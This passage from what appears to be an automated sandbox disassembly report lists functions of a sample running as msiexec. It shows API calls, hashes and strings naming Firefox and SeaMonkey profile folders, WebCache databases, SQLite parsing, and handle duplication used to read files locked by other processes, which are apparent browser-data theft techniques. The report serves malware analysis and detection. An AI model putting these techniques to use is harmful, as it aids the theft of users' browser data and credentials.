                                                                                                        • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                        Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00403E50
                                                                                                        • memset.MSVCRT ref: 00403E65
                                                                                                        • memset.MSVCRT ref: 00403E7A
                                                                                                        • memset.MSVCRT ref: 00403E8F
                                                                                                        • memset.MSVCRT ref: 00403EA4
                                                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                        • memset.MSVCRT ref: 00403F6B
                                                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                        • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                        • API String ID: 1829478387-2068335096
                                                                                                        • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                        • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                        • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                        • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                        Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00403FE1
                                                                                                        • memset.MSVCRT ref: 00403FF6
                                                                                                        • memset.MSVCRT ref: 0040400B
                                                                                                        • memset.MSVCRT ref: 00404020
                                                                                                        • memset.MSVCRT ref: 00404035
                                                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                        • memset.MSVCRT ref: 004040FC
                                                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                        • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                        • API String ID: 1829478387-3369679110
                                                                                                        • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                        • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                        • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                        • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                        Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                        • API String ID: 3510742995-2641926074
                                                                                                        • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                        • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                        • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                        • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                        Function 0041837F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                        • GetLastError.KERNEL32 ref: 0041847E
                                                                                                        • free.MSVCRT ref: 0041848B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateErrorFileLastfree
                                                                                                        • String ID: |A
                                                                                                        • API String ID: 981974120-1717621600
                                                                                                        • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                        • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                        • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                        • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                        Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                          • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                          • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                        • memset.MSVCRT ref: 004033B7
                                                                                                        • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                        • wcscmp.MSVCRT ref: 004033FC
                                                                                                        • _wcsicmp.MSVCRT ref: 00403439
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                        • String ID: $0.@
                                                                                                        • API String ID: 2758756878-1896041820
                                                                                                        • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                        • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                        • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                        • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                        Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 2941347001-0
                                                                                                        • Opcode ID: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                                        • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                        • Opcode Fuzzy Hash: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                                        • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                        Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00403C09
                                                                                                        • memset.MSVCRT ref: 00403C1E
                                                                                                          • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                          • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                        • wcscat.MSVCRT ref: 00403C47
                                                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                        • wcscat.MSVCRT ref: 00403C70
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memsetwcscat$wcscpywcslen
                                                                                                        • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                        • API String ID: 2489821370-1174173950
                                                                                                        • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                        • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                        • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                        • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                        Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040A824
                                                                                                        • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                        • wcscpy.MSVCRT ref: 0040A854
                                                                                                        • wcscat.MSVCRT ref: 0040A86A
                                                                                                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                        • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 669240632-0
                                                                                                        • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                        • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                        • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                        • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                        Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • wcschr.MSVCRT ref: 00414458
                                                                                                        • _snwprintf.MSVCRT ref: 0041447D
                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                        • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                        • String ID: "%s"
                                                                                                        • API String ID: 1343145685-3297466227
                                                                                                        • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                        • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                        • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                        • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                        Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                        • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProcProcessTimes
                                                                                                        • String ID: GetProcessTimes$kernel32.dll
                                                                                                        • API String ID: 1714573020-3385500049
                                                                                                        • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                        • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                        • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                        • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                        Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004087D6
                                                                                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                          • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                        • memset.MSVCRT ref: 00408828
                                                                                                        • memset.MSVCRT ref: 00408840
                                                                                                        • memset.MSVCRT ref: 00408858
                                                                                                        • memset.MSVCRT ref: 00408870
                                                                                                        • memset.MSVCRT ref: 00408888
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 2911713577-0
                                                                                                        • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                        • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                        • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                        • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                        Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                        • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                        • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcmp
                                                                                                        • String ID: @ $SQLite format 3
                                                                                                        • API String ID: 1475443563-3708268960
                                                                                                        • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                        • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                        • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                        • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                        Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcsicmpqsort
                                                                                                        • String ID: /nosort$/sort
                                                                                                        • API String ID: 1579243037-1578091866
                                                                                                        • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                        • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                        • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                        • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                        Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040E60F
                                                                                                        • memset.MSVCRT ref: 0040E629
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                        Strings
                                                                                                        • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                        • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                        • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                        • API String ID: 3354267031-2114579845
                                                                                                        • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                        • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                        • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                        • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                        Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset
                                                                                                        • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                        • API String ID: 2221118986-1725073988
                                                                                                        • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                        • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                        • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                        • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                        Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                        • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$memcmp
                                                                                                        • String ID: $$8
                                                                                                        • API String ID: 2808797137-435121686
                                                                                                        • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                        • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                        • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                        • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                        Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                          • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                          • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                          • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                          • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                          • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                          • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                          • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
